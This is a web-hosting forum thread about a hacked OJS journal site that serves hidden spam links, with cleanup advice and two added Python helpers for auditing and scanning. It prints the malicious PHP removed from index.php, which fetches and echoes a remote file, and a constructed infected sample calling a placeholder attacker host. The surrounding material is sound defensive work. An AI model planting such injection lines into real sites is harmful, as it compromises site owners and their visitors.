OJS 3.3.0.13 security breach / malicious code being implemented on site

We have had recurring problems of people/bots making accounts and then uploading junk files such as html or php files, most recently in January after which I upgraded to 3.3.0.13 from 3.3.0.6.

I delete these accounts and the associated junk files. I thought things were okay but the journal back end is now throwing errors, and the four tabs on the Submission page (My Queue, Unassigned, all Active, Archives) are all empty when they should not be, even though the Editorial Activity page correctly shows 23 active submissions.

The errors are:

  • “Error. An unexpected error has occurred. Please reload the page and try again” as soon as I log in.
  • “Failed Ajax request or invalid JSON returned” when I click on the notification bell.

The error log has this error multiple times, “ojs2: 404 Not Found”, but no actual PHP errors.

If I inspect the page when it shows an error, the div with the id pkpHelpPanel has a long list of hidden URLs of what look like hacked OJS journal sites (see screenshot), all containing the word “slot”. I’ve searched within my database and all files for this text. It seems the session files (e.g. sess_0119c7fc7e7afde2a95e86f73a772aba) in the tmp folder contain code to query the event_log (see screenshot) for files for which the original filename contained “slot”. I’ve deleted these records, and files, and the session files. However, logging out and in again regenerates session files with this malicious code.


It seems to be a ‘task’ page that loads the list of hidden URLs (/$$$call$$$/page/page/tasks?_=1676637218768).

Additionally, every page on my site has a list of hidden URLS at the very last line (below the closing tags) like this:

I don’t know where the malicious code is that is causing this, or how to get rid of it. As I said, I’ve searched within the database and files. And how to get the submissions tabs to show the correct files? I have daily backups and could revert to a previous version but, without fixing the actual problem, I suspect the same problems will arise. Looking back at a copy of my 3.3.0.6 version I see that this problem was there too and therefore was not removed by the upgrading process.

This is obviously something which has affected many other sites (the list being displayed is long).

Sorry for the long post. I’ve spent a lot of time trying to work out what is going on and I’m not sure what else to try.

If anyone could assist at all, I’d be very, very grateful!


Hi @Alice,

Is your files_dir (in config.inc.php) configured inside your web root? If so, that’s an unsafe misconfiguration, and the most common way OJS sites get attacked.

Regards,
Alec Smecher
Public Knowledge Project Team

Hi Alec,

Thanks for your reply. It does seem to be. Can I just move it up a level and change the path in config.inc.php? Or is it more complicated than that?

Thanks

Hi @Alice,

If you can move the files directory outside of public_html (or whatever the equivalent is on your server), and configure config.inc.php to point to its new location, that’ll prevent new malicious attempts to break in.

However, it sounds like someone has already used this to break in and edit files on your server (to add spam to the scripts). They have likely done this by installing a backdoor script somewhere in public_html, and you’ll need to make sure that is gone.

Cleaning up after a server break-in is a little beyond the scope of this forum, but in short, the safest way to clean up is to:

  • Get fresh (trusted) copies of as much of the site as you can, and
  • Manually review whatever you can’t rebuild.

Any directory can contain a malicious but harmlessly-named extra .php or .phtml file, and any existing .php script can contain malicious modifications. So every directory that you can remove from your server entirely and replace with a fresh copy is a directory you won’t have to worry about.

If you want to replace your OJS installation directory entirely with a fresh (safe) copy, you’ll need to save a few pieces from your old installation:

  • public directory (which should contain subdirectories and image files only)
  • config.inc.php (the configuration file)

You’ll also have to re-install any extra plugins.

Regards,
Alec Smecher
Public Knowledge Project Team

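The files_dir check Alec describes, as an added audit helper (example code, not part of OJS or the PKP project): it reads files_dir out of config.inc.php text and reports whether it resolves to the web root or somewhere beneath it. The sample config fragment and the /home/journal/public_html paths are constructed for illustration.

```python
"""Added example (not OJS project code): does files_dir in config.inc.php
sit inside the web root? That is the misconfiguration the thread is about."""
import re
from pathlib import PurePosixPath

# Constructed fragment of an OJS config.inc.php, with files_dir under public_html.
SAMPLE_CONFIG = """
;<?php exit(); // DO NOT DELETE ?>
[files]
; Complete path to directory to store uploaded files
files_dir = /home/journal/public_html/files
public_files_dir = public
"""

def read_files_dir(config_text):
    """Return the files_dir value, or None if absent. Skips ';' comment lines
    and strips optional surrounding quotes."""
    for line in config_text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        m = re.match(r'^files_dir\s*=\s*"?([^"\s;]+)"?', line)
        if m:
            return m.group(1)
    return None

def is_inside_web_root(files_dir, web_root, install_dir):
    """True when files_dir is web_root itself or a path beneath it.
    A relative files_dir is resolved against the OJS install directory;
    '.' and '..' components are normalised without touching the filesystem."""
    root = PurePosixPath(web_root)
    target = PurePosixPath(files_dir)
    if not target.is_absolute():
        target = PurePosixPath(install_dir) / target
    parts = []
    for p in target.parts:
        if p == "..":
            if len(parts) > 1:
                parts.pop()
        elif p != ".":
            parts.append(p)
    target = PurePosixPath(*parts)
    return target == root or root in target.parents

def audit(config_text, web_root, install_dir):
    """One-line verdict suitable for a cron job or a pre-upgrade checklist."""
    fd = read_files_dir(config_text)
    if fd is None:
        return "files_dir not set"
    if is_inside_web_root(fd, web_root, install_dir):
        return f"UNSAFE: files_dir {fd} is inside web root {web_root}"
    return f"ok: files_dir {fd} is outside web root {web_root}"

if __name__ == "__main__":
    print(audit(SAMPLE_CONFIG, "/home/journal/public_html", "/home/journal/public_html"))
```

Run it against the real config.inc.php contents and the server's document root; a path like /home/journal/ojs_files (outside public_html) is the target state.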

Thank you. I’ll follow your advice. Much appreciated!

Thanks Alec,

With your help I have fixed the issue. In case it helps someone else: in addition to doing as you described above (moving the files folder and replacing OJS files from a clean copy), I also inspected the files in the public_html root and deleted a line of malicious code that had been added to the bottom of index.php in root. This was linking to a text file on another (presumably hacked) site, and that is where all the malicious links were coming from:

```php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://(removed)/bl/1.txt");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$output = curl_exec($ch);
curl_close($ch);
echo $output;
?>
```

Thanks for your prompt help.

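A triage scanner for the pattern Alice found (added example, not OJS or PKP code): it flags physical lines in .php/.phtml files that fetch a remote URL and echo or eval the response, which is how the appended index.php line worked. It goes slightly beyond the post by also matching file_get_contents; the sample index.php contents and the attacker.invalid host are constructed.

```python
"""Added example (not OJS project code): find PHP source lines that fetch a
remote URL and output the result, the shape of the line appended to index.php."""
import os
import re

FETCH_RE = re.compile(r"\b(curl_exec|file_get_contents)\s*\(")
REMOTE_RE = re.compile(r"https?://", re.IGNORECASE)
OUTPUT_RE = re.compile(r"\b(echo|print|eval)\b")

def suspicious_lines(source):
    """Return [(line_no, text)] for lines that fetch a remote URL and echo/eval
    the result. Injected code is usually one long line, so a per-line check
    catches it; treat hits as leads to review, not proof of compromise."""
    hits = []
    for n, line in enumerate(source.splitlines(), 1):
        if FETCH_RE.search(line) and REMOTE_RE.search(line) and OUTPUT_RE.search(line):
            hits.append((n, line.strip()[:120]))
    return hits

def scan_tree(root):
    """Walk root and return {path: hits} for .php/.phtml files with findings."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".php", ".phtml")):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = suspicious_lines(fh.read())
                if hits:
                    findings[path] = hits
    return findings

# Constructed samples: a benign index.php and the same file with a fetch-and-echo
# line appended, modelled on the one in the post (placeholder host).
CLEAN_INDEX = "<?php\nrequire_once('bootstrap.php');  // constructed stand-in\n"
INFECTED_INDEX = CLEAN_INDEX + (
    '<?php $ch = curl_init();curl_setopt($ch, CURLOPT_URL, "http://attacker.invalid/bl/1.txt");'
    'curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$output = curl_exec($ch);'
    'curl_close($ch);echo $output;?>\n'
)

if __name__ == "__main__":
    print("clean:", suspicious_lines(CLEAN_INDEX))
    print("infected:", suspicious_lines(INFECTED_INDEX))
    for path, hits in scan_tree(".").items():
        print(path, hits)
```

Compare any hit against the same file in a fresh OJS download before deleting it, since a legitimate plugin that proxies an API response would match the same pattern.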

Hi @Alice,

Glad to hear it looks like it’s resolved! I removed the spammer domain from your post above, just to avoid giving them any extra attention.

Thanks,
Alec Smecher
Public Knowledge Project Team

